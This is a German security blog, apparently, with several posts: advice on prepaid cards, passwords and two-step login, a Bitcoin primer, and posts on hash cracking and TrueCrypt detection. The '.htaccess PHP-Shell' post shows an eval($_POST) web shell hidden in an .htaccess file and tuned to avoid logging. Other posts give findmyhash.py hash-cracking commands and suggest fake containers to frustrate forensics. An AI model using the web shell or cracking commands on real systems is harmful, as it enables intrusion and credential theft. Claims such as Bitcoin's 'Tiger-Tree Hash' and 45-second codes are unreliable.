Online Selbstschutz – Was kann ich tun?
Wir als Kunden müssen uns vor Hackern schützen, mehr als je zuvor!
Man fühlt sich als Kunde eines ISP / Hoster / Online-Gaming Portal immer mehr alleine gelassen, was den Datenschutz angeht.
Leider musste ich vor kurzem wieder lesen, dass es einen möglichen erneuten Einbruch bei dem Hoster 1blu gab. Ist nun nach Hetzner auch 1blu Opfer eines Hackerangriffes geworden?
Kurz darauf kam eine weiter Hiobsbotschaft, dass bei Valve "Steam-Plattform" eingebrochen worden ist.
Nach Sony ist Valve einer der größten Gaming-Portale, mit der Möglichkeit online Spiele zu erwerben.
Kurz zusammen gefasst, gab es in den letzten Wochen mehr als einen großen Einbruch, bei dem möglicherweise Kundendaten und Kontodaten bzw. Kredit Karten Daten entwendet worden sind.
Das verunsichert uns als Kunde. Wenn man schon seinem Provider / Gaming-Portal Anbieter nicht mehr vertrauen kann, wem dann?
Daher bin ich der Auffassung, dass man sich als Kunde, mehr um seine eigenen Datensicherheit kümmern sollte. Ich versuche hier ein Beispiel zu geben, wie man zumindest die Zahlungsmethoden, etwas verbessern kann.
Da man bei der Bestellungen einer Dienstleistung keine falschen Personenangaben machen darf, muss man sich auf die Zahlungsmethoden konzentrieren. Damit man dabei auch im legalen Ramen bleibt, empfiehlt sich der Einsatz von "Einmal Kreditkarten" oder "Pre-Paid Kreditkarten"
Diese "Pre-Paid" Karten kann man anstatt seiner eigenen Kredit Karte zum bezahlen verwenden.
Dies hat einen großen Vorteil:
Sofern bekannt wird, dass es einen Hackereinbruch gegeben hat, kann man diese Karte einfach vernichten und sich eine neue Pre-Paid Kreditkarte zulegen. Ohne befürchten zu müssen, dass die Kreditkarten Nummer irgend wo im Internet zum Verkauf angeboten wird. Des weiteren spart man sich den Ärger mit seiner Bank. Dort muss man anrufen und jeden unrechtmäßige Buchung zurück fordern oder ggf. die Karte sperren lassen. Diese Vorgänge sind meistens auch immer mit weiteren Kosten verbunden.
Auch dient eine Pre-Paid Kreditkarte zur Kostenkontrolle. Dort kann nur so viel ausgegeben werden, wie man zuvor auf die Karte transferiert hat.
Sofern der Einsatz einer Pre-Paid Kreditkarte nicht möglich ist und man ein normales Konto anbeben muss, empfiehlt sich folgendes:
Heutzutage kann man ohne Probleme ein weiteres Online-Bankkonto eröffnen. Dies sollte man dazu benutzen, sich bei den o.g. Diensten anzumelden. Durch das separate Konto hat man die volle Kostenkontrolle und kann ggf. ungewollte Abbuchungen stornieren lassen. Da dieses "Zweit-Konto" nicht als Gehalts- oder Sparkonto genutzt werden sollte, hat der Hacker auch nicht die Möglichkeit, "viel" Geld abbuchen zu lassen. Auf diesem Konto sollte immer nur so viel Geld liegen, wie man monatlich für die Dienstleistungen in Anspruch nimmt.
Fazit:
Schade, dass man solche Vorkehrungen treffen muss, aber die Vergangenheit hat gezeigt, dass wir als Kunden uns mehr schützen müssen. Auf den Verkauf der einzelnen Datensätze, speziell Name/Adresse/Alter/E-Mail, werde ich hier nicht weiter eingehen. Dafür müsste man sich, in einem weiteren Artikel, mal Gedanken machen. Ich hoffe mit diesem Artikel, nicht nur die einzelnen Benutzer ein wenig zu sensibilisieren, sondern auch die Anbieter der Dienstleistungen unsere Daten separat zu speichern.
Ist deine E-Mail Adresse gehackt, überprüfe es bei pwnedlist.com
https://pwnedlist.com ist ein Service von Alen Puzic und Jasiel Spelman. Beide arbeiten bei DVLabs.
Sie haben es sich zur Aufgabe gemacht, alle veröffentlichten Pastbin / Torrent Dateien die sensible E-Mail Adressen und Passwörter enthalten zu sammeln. Auf diesem Wege werden, von Zeit zu Zeit, immer wieder "Full disclosure" Artikel veröffentlicht von Hackergruppen.
Puzic schreibt: "Ich habe versucht innerhalb von 2 Stunden so viele Daten wie möglich zu sammeln und bin auf 30.000 Benutzernamen und Passwörter gestoßen." Weiterhin schreibt er, dass wöchentlich ca 40.000 neue E-Mail Adressen und Benutzernamen dazu kommen.
Die pwnedlist.com Datenbank enthält ca 5 Millionen gehackte E-Mail Adressen und Benutzernamen. Durch die Eingabe seiner E-Mail Adresse oder Server Benutzernamen, kann man feststellen, ob diese irgendwo im Netz bekannt sind.
Auf der Webseite pwnedlist.com selber, werden keine sensiblen Benutzerdaten und Passwörter gespeichert. In der Datenbank ist lediglich der Hash zu der E-Mail Adresse / Benutzernamen gespeichert und ob diese im Netz bekannt ist. Die Datenbank gibt lediglich ein "JA" oder "NEIN" zurück, so Puzic.
Was sollte ich machen, wenn meine E-Mail Adresse dort gelistet ist?
Keine Panik! Das die Adresse in der Liste erscheint, heißt noch nicht, dass diese auch von Hackern missbraucht worden ist. Man sollte sofort das Passwort des besagten Accounts / E-Mail Adresse ändern. Natürlich sollte man auch alle seine anderen Passwörter einmal ändern, da es nicht ausgeschlossen ist, dass diese auch missbraucht worden sind. Gerne wird auch nur ein Passwort für alles verwendet, dann muss man all seine Dienste die man mit diesem Passwort geschützt hat ändern.
Die beiden Sicherheitsexperten wollen in Zukunft Updates auf Twitter veröffentlichen. Ihr Twitter Account: @pwnedlist
Die Webseite ist wieder ein gutes Beispiel, dass man verschiedene Passwörter für verschiedene Online-Dienste nutzen sollte. So sollte man für sein E-Mail Postfach ein anderes Passwort verwenden, wie z.B. für sein Ebay Account.
Wie sieht ein sicheres Passwort aus?
Ein sicheres Passwort sollte aus mindestens 9 Zahlen & Buchstaben (Groß+Kleinschreibung) bestehen. Der einfachste Weg sich ein sicheres Passwort zu merken ist, sich einen Satz zu merken und dann ein paar Sonderzeichen bzw. Zahlen hinzufügen.
Beispiel:
Satz: "Mein Hund hat die Katze des Nachbarn gebissen"
Wir nehmen nun die Anfangsbuchstaben des o.g. Satzes: MHhdKdNg und fügen am Ende noch ein "!" hinzu. Dann erhalten wir:
Passwort: MHhdKdNg!
Gerne kann man hier noch eine Zahl mit einbringen, z.B. "MHhdKdNg2011!"
Google Halbjahres Bilanz
Google hat im ersten Halbjahr 2011 über 6000 Anfragen bekommen, Benutzerdaten zur strafrechtlichen Verfolgung heraus zu geben. Dies geht aus dem offiziellen Bericht von Google hervor. Dies ist eine Steigerung von 29% im Vergleich der letzten 6 Monate.
5950 Anfragen waren von US Strafverfolgungsbehörden. Es wurde um die Herausgabe von über 11000 Benutzerkonten, bei Google und Youtube gebeten.
Google ist diesen Anfragen in 93% der Fällen so schnell es ging nachgekommen.
Die zweithöchste Anfrage an Google kam aus Indien mit über 1700 Anfragen bezüglich der Herausgabe von über 2400 Benutzerkonten. England hat nach Indien über 1200 Anfragen an Google gestellt.
Google ist die einzige große Internet Firma, welche einen transparenten Bericht, über die herausgegebenen Daten veröffentlicht. Was machen andere Firmen? Alles still und heimlich?
Weitere Links:
Transparency Report (raw data)
Findmyhash.py – Hashwerte online berechnen lassen
Ich bin kürzlich über ein kleines Tool gestolpert, dass es einem ermöglicht folgende Hashwerte online zu überprüfen:
Akzeptierte Hash Werte
- MD4 - RFC 1320
- MD5 - RFC 1321
- SHA1 - RFC 3174 (FIPS 180-3)
- SHA224 - RFC 3874 (FIPS 180-3)
- SHA256 - FIPS 180-3
- SHA384 - FIPS 180-3
- SHA512 - FIPS 180-3
- RMD160 - RFC 2857
- GOST - RFC 5831
- WHIRLPOOL - ISO/IEC 10118-3:2004
- LM - Microsoft Windows hash
- NTLM - Microsoft Windows hash
- MYSQL - MySQL 3, 4, 5 hash
- CISCO7 - Cisco IOS type 7 encrypted passwords
- JUNIPER - Juniper Networks $9$ encrypted passwords
- LDAP_MD5 - MD5 Base64 encoded
- LDAP_SHA1 - SHA1 Base64 encoded
Dazu wird der Hashwert automatisch bei diversen Hash-Cracking Webseiten hoch geladen und dann gegen deren Datenbanken geprüft. Es kann natürlich vorkommen, dass der eingegebene Hashwert nicht gefunden wird. Dann ist es hilfreich seine lokalen Rainbowtables zu verwenden. Das Skript und die Rainbowtables sollten nur dazu verwendet werden, seine eigenen Passwörter auf Schwachstellen zu untersuchen.
Benötigt wird Python zum starten des Skriptes.
Beispiele:
python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6"
python findmyhash.py SHA1 -h "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
python findmyhash.py SHA224 -h "90a3ed9e32b2aaf4c61c410eb925426119e1a9dc53d4286ade99a809"
python findmyhash.py LM -h "01fc5a6be7bc6929aad3b435b51404ee"
python findmyhash.py NTLM -h "0cb6948805f797bf2a82807973b89537"
python findmyhash.py MYSQL -h "*94bdcebe19083ce2a1f959fd02f964c7af4cfc29"
python findmyhash.py MYSQL -h "94bdcebe19083ce2a1f959fd02f964c7af4cfc29"
python findmyhash.py CISCO7 -h "12090404011C03162E"
python findmyhash.py JUNIPER -h "\$9\$90m6AO1EcyKWLhcYgaZji"
python findmyhash.py LDAP_MD5 -h "{MD5}CY9rzUYh03PK3k6DJie09g=="
python findmyhash.py LDAP_SHA1 -h "{SHA}qUqP5cyxm6YcTAhz05Hph5gvu9M="
Das Script Findmyhash.py kann man hier downloaden: LINK
Zwei Wege-Authentifizierung für das Google-Konto
Die Google-Dienste, wie zum Beispiel Google+,Google Mail oder Google Texte und Tabellen, werden von viele Benutzer heutzutage immer häufiger benutzt. Für viele User ist das Google Konto zentrale Sammelstelle für sämtliche E-Mail Accounts und Dokumentenverwaltung. Gerne werden auch private Bilder bei Google Picasa hinterlegt.
Diese Dienste sind nur mit einem Passwort gesichert und sollte dieses einmal in die falschen Hände geraten, ist der Zugriff auf das Google-Konto nicht mehr möglich. Persönliche Daten,Bilder und Dokumente sind nun verloren.
Google hat dafür eine Lösung entwickelt, mit der man eine zusätzliche Sicherheitsebene erhält. Die Zwei-Wege-Authentifizierung.
Heutzutage hat fast jedes größere Unternehmen, eine solche Ebene zur Absicherung eingerichtet. In den meisten Fällen wird ein "RSA-Token" verwendet. Nach der Eingabe des Benutzernamen und Passwort wird noch zusätzlich ein Sicherheitscode, meist in Form einer Zahlenkombination verlangt. Diese zusätzliche Form von Sicherheit bzw. Sicherheitsebene kann nur mit sehr viel Aufwand umgangen werden. 
Google hat für seine Benutzer ein ähnliches Verfahren entwickelt. Mit Hilfe des Smart-Phones wird das App Google-Authenticator heruntergeladen und mit dem Google-Konto verknüpft. Eine ausführliche Anleitung auf Deutsch findet man hier:
Erste Schritte bei der Bestätigung in zwei Schritten
Bei dem einloggen in sein Google-Account, wird nun ein Bestätigungscode zusätzlich zu dem Passwort verlangt. Der Bestätigungscode wird alle 45 Sekunden generiert und kann vom Smart-Phone abgelesen werden. Wichtig: Nach der Aktivierung der 2 Wege Authentifizierung muss man immer zusätzlich den Bestätigungscode mit angeben, sonst kann man sich nicht mehr in sein Google-Konto einloggen.
Des weiteren kann man nun auch "Einmal Passwörter" für einzelnen Google-Dienste vergeben. Ein klassisches Beispiel ist, dass man seinem Smart-Phone ein "Einmal Passwort" vergibt. Im Falle, dass man sein Handy verliert, kann man nun aus seinem Google-Konto heraus die Rechte für das Handy entziehen (revoke). Damit erhält der Dieb des Handys KEIN Zugriff mehr auf das Google-Konto.
Die Anleitung für "Einmal Passwörter" findest du hier: Anleitung
!!! WICHTIG !!!
Bei der Aktivierung der 2 Wege Authentifizierung bietet Google einem 10 Notfall-Bestätigungscodes an. Diese müssen an einem Sicheren Ort aufbewahrt werden, da man im Verlustfall des Handys keine weiteren Bestätigungscodes generieren kann. Auch sollte man das Zusenden von Bestätigungscodes via SMS auf ein anderes Handy/Festnetz aktivieren, so dass man zur Not sich immer noch in sein Google-Konto einloggen kann.
Lulzsec
In den letzten Tagen sind die Jungs und Mädels von "Lulzsec" wieder sehr aktiv gewesen. Lulzsec's neusten kriminellen online Angriff ist der Australische Domainregistrar und Webhoster "Distribute.IT" zum opfer gefallen. Dort konnte die Hacker-Gruppe 62.000 E-Mail Adressen und Passwörter entwenden. Betroffen waren unter anderem einige Universitäten und Regierungseinrichtungen. Der Webhoster "Distribute.IT" kommunizierte mit seinen Kunden, über eine eingerichteten Notfall-Blog: http://distributeitsupport.blogspot.com/
Zur Zeit ist die Webseite des Hosters immer noch "offline" nur der Notfall-Blog ist online.
Was sind Bitcoins ?
Kurz zur Geschichte von Bitcoins:
Bitcoins wurden 2008/2009 von Satoshi Nakamoto veröffentlicht. Es handelt sich dabei um eine digitale
Währung, über die in den letzten Monaten vermehrt in Deutschland berichtet wurde. Hier ein Artikel von Spiegel-Online "Geld aus der Steckdose" & ein Artikel von Netzpolitik.org Ich möchte auch auf den Artikel vom BVDW hinweisen "BVDW warnt Verbraucher und Händler vor Bitcoins als Zahlungsmittel"
Was macht Bitcoins so interessant?
Es ist höchstwahrscheinlich der Anreiz aus "Nichts" Geld zu machen. Bitcoins kann jeder mit seinem eigenem PC erschaffen und die aus dem Nichts erschaffenen Bitcoins sammeln und damit online handeln. Die Generierung von Bitcoins nennt man "mining". Diverse Miner stehen einem zur Verfügung, egal welches Betriebssystem man verwendet. Des weiteren gibt es keine zentrale Kontrollinstanz, z.B. eine Bank die deine Bitcoins einziehen kann oder ein Staat der Bitcoins einfrieren kann. Wir erinnern uns an die WikiLeaks-Konten, die einfach eingefroren worden wurden.
Welche Technik steckt dahinter?
Jeder einzelne Benutzer von Bitcoins bekommt eine Geldbeutel (engl. wallet) in dem er seine Bitcoins aufbewahrt. Sollte dieser virtuelle Geldbeutel verloren gehen, ist auch das Geld weg, wie im richtigen Leben. In diesem Geldbeutel befindet sich eine öffentlicher und ein privater Key. Dieser öffentliche Key dient zum Senden und Empfangen von Bitcoins.
Beispiel für einen öffentlichen Key aus einem Wallet :
1B5GxmfyJhHRDdPbXmdJDH23GfyxMoM8yPeh
Der private Key bestätigt dann die Transaktion, so dass sicher gestellt wird, dass das Geld auch angekommen ist. Durch diverse öffentliche Keys ist sichergestellt, dass keine persönlichen Daten zum Austausch der Bitcoins benötigt wird. Die Validierung von Transaktionen findet durch die Knoten des Netzwerkes statt. Bei jeder Transaktion wird der in der Bitcoin enthaltene öffentliche Schlüssel durch den seines neuen Besitzers ausgetauscht und mit dem privaten Schlüssel signiert. Über den Tiger-Tree Hash wird jede Transaktion in der Datenbank festgehalten, um
doppeltes Ausgeben zu verhindern. Das Limit für alle je existierende Bitcoins wurde auf 21 Millionen festgesetzt.
"Neue Bitcoins werden durch die Lösung komplexer mathematischer Probleme verteilt auf das Rechnernetz generiert, wobei die Obergrenze von jemals existierenden Bitcoins auf 21 Millionen (2,1 * 106) festgelegt ist, wobei jede Bitcoin 100 Millionen (108) Mal geteilt werden kann. Dies ergibt eine gesamte Anzahl von 21 Billiarden (2,1 * 1015) Einheiten. Neue Bitcoins berechnen sich durch die Formel (6 × 50 Bitcoins/Stunde) × (eigene CPU-Geschwindigkeit / Summe der totalen CPU-Geschwindigkeit des Netzwerkes)"
(Quelle: Wikipedia)
Die Anzahl an Minern ist in den letzten Monaten sehr gestiegen, so dass der Schwierigkeitsgrad dadurch erhöht wurde. Es lohnt sich heutzutage nur noch auf GPUs zu minen.
Was kann ich mit Bitcoins machen?
Es gibt diverse Anbieter die heute schon Bitcoins in US-Dollar oder andere Währungen umtauschen. Dies hat zur Folge, dass sich eine eigene Bitcoin-Börse für Bitcoins entwickelt hat.
Ist fast wie auf dem echten Parkett, volle Übersicht! Auf einen Blick die Bitcoin-Weltmärkte überblicken.
Bicoin Charts der letzten Tage
Die Bitcoin Entwicklung in den letzten Stunden. Durch ausgefeilte API's lässt es sich auch voll automatisch handeln (engl. traden)
Hier kann man Bitcoins handeln, das heißt ankaufen und verkaufen. Durch den Ankauf von Bitcoins in US-Dollar und den Verkauf in Euro kann man durch die Bitcoin Börsen Gewinne erzielen. Auch gibt es einige Internet Dienste die Bitcoins als Zahlungsmittel akzeptieren.
Was muss ich tun um auch zur Bitcoin-Gemeinde zu gehören?
1. Bitcoin Client downloaden hier
Mehr muss man nicht machen. Jetzt erhält man einen digitalen Geldbeutel (engl. wallet) und kann Zahlungen senden bzw. empfangen
anhand seiner öffentlichen Keys.
In meinen nächsten Blog-Einträgen werde ich näher auf die einzelnen Aspekte und Möglichkeiten von Bitcoins eingehen. Solltet Ihr Fragen haben, einfach kurz anmelden und die Frage stellen.
PHP-Shell in .htaccess Datei
Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers.
Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten.
Beispiel .htaccess:
# Orginal von http://www.justanotherhacker.com # umgeschrieben von http://blog.botnetzprovider.deOrder allow,deny Allow from all # Apache sagen bitte die .htaccess Datei als PHP interpretieren. AddType application/x-httpd-php .htaccess # Botnetzprovider PHP-Shell ### php eval($_POST['botnetzprovider_sais']); shell ist so nicht funktionsfähig #
Truecrypt-Container in Festplatten Backups aufspühren
Im Beitrag über "Truecrypt-Container auf Datenträger finden" hatte ich beschrieben, wie man Container auf der Festplatte finden kann.
Hier stelle ich euch ein neues Tool vor von Mr. Will Schroeder and Mr. Tyler Dean, die für PenTestIT TCDiscover geschrieben haben. Es handelt sich dabei um ein in Python geschriebenes Skript, welches Festplatten Images, die via "dd" erstellt worden sind, nach Truecrypt-Containern absucht.
Das Tool findet ihr hier: [download tcdiscover]
So startet man TCDiscover:
Usage: ./tcdiscover.py -i
Truecrypt-Container auf Datenträger finden
Als Forensiker, wünscht man sich oft, schnell und präzise TrueCrypt Container auf einer Festplatte zu identifizieren.
Auf die Frage der Entschlüsselung oder Herausgabe von Passwörtern auf Anordnung, möchte ich hier nicht weiter eingehen. (Denkt daran, wohin man verreist und welche Daten man mit nimmt!)
Durch die tägliche Arbeit mit TrueCrypt Container habe ich ein Interessantes Tool gefunden.
TCHunt - Erkennung von TrueCrypt Containern und TrueCrypt Bootloader
Dieses Tool, welches unter Windows und Linux läuft, hilft dem Anwender, mit ein paar Mausklicks die vorhandenen TrueCrypt Container, auf dem jeweiligen Datenträger zu finden. Dabei ignoriert TCHunt jegliche Dateinamen oder Dateiendungen bei der Suche.
Leider produziert dieses Tool auch false-positives. Es kann einen normalen Container nicht, von einer Datei mit Random-Daten unterscheiden. Ein einfacher Befehl, kann zu false-positives führen, wenn man TCHunt startet. Der Autor des Tools schreibt, dass er lieber ein paar false-positives erzeugt, anstatt false-negatives als false-positives zu erkennen!
False-Positiv erzeugen unter Linux:
cat /dev/urandom > mein-container.tc
Vielleicht ist es gar nicht so abwegig, sich anhand der gegebenen Forensik Software, ein paar "fake" Container an zu legen, um die Entdeckung seiner echten Container zu verzögern.
Ich versuche diese Liste mit Programmen zur Erkennung von TrueCrypt Containern zu erweitern, sobald ich Alternativen finde. Gerne könnt Ihr mir auch einen Kommentar mit Programmvorschlägen machen.